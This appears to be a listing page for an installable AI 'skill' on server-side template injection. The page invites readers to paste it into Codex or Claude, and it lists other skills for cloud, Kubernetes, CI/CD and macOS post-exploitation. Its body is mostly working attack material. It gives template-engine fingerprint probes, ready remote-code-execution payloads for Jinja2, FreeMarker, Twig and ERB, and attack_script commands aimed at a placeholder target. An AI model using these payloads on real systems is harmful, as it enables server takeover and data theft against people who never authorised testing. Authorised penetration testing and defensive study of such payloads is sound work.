メニュー
Server-Side Template Injection — detection, engine fingerprinting, and exploitation across 7 template engines
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
SOC 職業分類に基づく
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | attack-ssti |
| description | Server-Side Template Injection — detection, engine fingerprinting, and exploitation across 7 template engines |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["ssti","rce","injection","web","attack"] |
| tech_stack | ["web","python","java","ruby","php"] |
| cwe_ids | ["CWE-94","CWE-1336"] |
| chains_with | ["attack-ssrf"] |
| prerequisites | [] |
| severity_boost | {"attack-ssrf":"SSTI → SSRF → internal service access = RCE chain"} |
Detect and exploit server-side template injection to achieve code execution on the server.
# Automated SSTI detection across 7 engines
attack_script ssti_tester "https://TARGET/search?q=FUZZ" --param q --json-output
# Quick mode (math payloads only)
attack_script ssti_tester "https://TARGET/render" --param template --quick
Inject into every user-controlled parameter:
{{7*7}} → 49 (Jinja2, Twig)
${7*7} → 49 (FreeMarker, Velocity, EL)
<%= 7*7 %> → 49 (ERB, JSP)
#{7*7} → 49 (Thymeleaf)
{{7*'7'}} → 7777777 (Jinja2 string multiplication)
{{config.items()}} → Jinja2 (Flask/Python)
{{request.application.__globals__}} → Jinja2
${T(java.lang.Runtime)} → Spring EL
<#assign x=1>${x} → FreeMarker
{{_self.env.getFilter('id')}} → Twig (PHP)
<%= system('id') %> → ERB (Ruby)
Jinja2 (Python/Flask):
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{''.__class__.__mro__[1].__subclasses__()[XXX]('id',shell=True,stdout=-1).communicate()}}
FreeMarker (Java):
${"freemarker.template.utility.Execute"?new()("id")}
Twig (PHP):
{{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}
ERB (Ruby):
<%= `id` %>
<%= system('id') %>
# Test POST parameters
attack_script ssti_tester "https://TARGET/api/render" --param content --method POST --data '{"content":"FUZZ"}'
| Finding | Severity |
|---|---|
| Math expression evaluated (7*7=49) | High (P2) |
| Config/env data leaked | High (P2) |
| Command execution achieved | Critical (P1) |
| File read via template | Critical (P1) |
attack_script ssti_tester — automated multi-engine detectiontplmap (external) — SSTI exploitation framework